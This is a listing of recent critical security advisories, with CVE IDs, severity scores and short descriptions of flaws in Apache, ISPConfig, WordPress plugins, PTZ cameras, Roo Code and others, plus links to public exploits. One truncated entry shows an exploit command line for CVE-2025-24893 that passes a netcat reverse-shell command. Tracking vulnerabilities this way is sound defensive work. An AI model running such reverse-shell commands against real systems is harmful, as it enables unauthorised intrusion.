Recent Advisories

Severity ID Title Vendor Product Date Type
CRITICAL 9.8 A50F22F9-6442-

Exploit for Path Traversal in Apache Http_Server_A50F22F9-6442-52A1-9ECE-32F56C60A888

🔥 CVE-2021-42013 Exploit Framework by Makaveli ...

N/A N/A GITHUBEXPLOIT
CRITICAL 9.8 AC4097E7-E7AD-

Exploit for Code Injection in Ispconfig_AC4097E7-E7AD-57DD-A002-5A3C882EE8C3

CVE-2023-46818 - ISPConfig PHP Code Execution | Exploit High...

N/A N/A GITHUBEXPLOIT
CRITICAL 9.8 CVE-2025-8359

AdForest <= 6.0.9 - Authentication Bypass to Admin_CVE-2025-8359

The AdForest theme for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 6.0.9. This is due to the plugin not ...

scriptsbundle AdForest * CVE
CRITICAL 9.9 CVE-2025-58371

Roo Code is vulnerable to command injection via GitHub actions workflow_CVE-2025-58371

Roo Code is an AI-powered autonomous coding agent that lives in users' editors. In versions 3.26.6 and below, a GitHub workflow used unsanitized pu...

RooCodeInc Roo-Code < 3.26.7 CVE
CRITICAL 10 CVE-2025-58367

DeepDiff is vulnerable to DoS and Remote Code Execution via Delta class pollution_CVE-2025-58367

DeepDiff is a project focused on Deep Difference and search of any Python data. Versions 5.0.0 through 8.6.0 are vulnerable to class pollution via ...

seperman deepdiff >= 5.0.0, < 8.6.1 CVE
CRITICAL 9.1 CVE-2025-58819

WordPress Bulk Featured Image Plugin <= 1.2.2 - Arbitrary File Upload Vulnerability_CVE-2025-58819

Unrestricted Upload of File with Dangerous Type vulnerability in CreedAlly Bulk Featured Image allows Upload a Web Shell to a Web Server. This issu...

CreedAlly Bulk Featured Image n/a CVE
CRITICAL 9.8 CVE-2025-35451

Pan-Tilt-Zoom cameras hard-coded default passwords with SSH and telnet enabled_CVE-2025-35451

PTZOptics and possibly other ValueHD-based pan-tilt-zoom cameras use hard-coded, default administrative credentials. The passwords can readily be c...

PTZOptics PT12X-SE-xx-G3 CVE
CRITICAL 9.8 CVE-2025-35452

Pan-Tilt-Zoom cameras default administrative credentials for web interface_CVE-2025-35452

PTZOptics and possibly other ValueHD-based pan-tilt-zoom cameras use default, shared credentials for the administrative web interface.

PTZOptics PT12X-SE-xx-G3 CVE
CRITICAL 9.4 CVE-2025-58366

Onyxia private helm repository credentials are leaked through unauthenticated API_CVE-2025-58366

Onyxia is a data science environment for Kubernetes. In versions 4.6.0 through 4.8.0, Onyxia-API leaked the credentials of private Helm repositorie...

InseeFrLab onyxia >= 4.6.0, < 4.9.0 CVE
CRITICAL 9.8 2B7709E2-7063-

Exploit for Code Injection in Xwiki_2B7709E2-7063-53CC-AEB1-9D041C752E37

Reverse shell for CVE-2025-24893 bash python3 CVE-2025-24893.py -u http://wiki.editor.htb/ -c "busybox nc ...

N/A N/A GITHUBEXPLOIT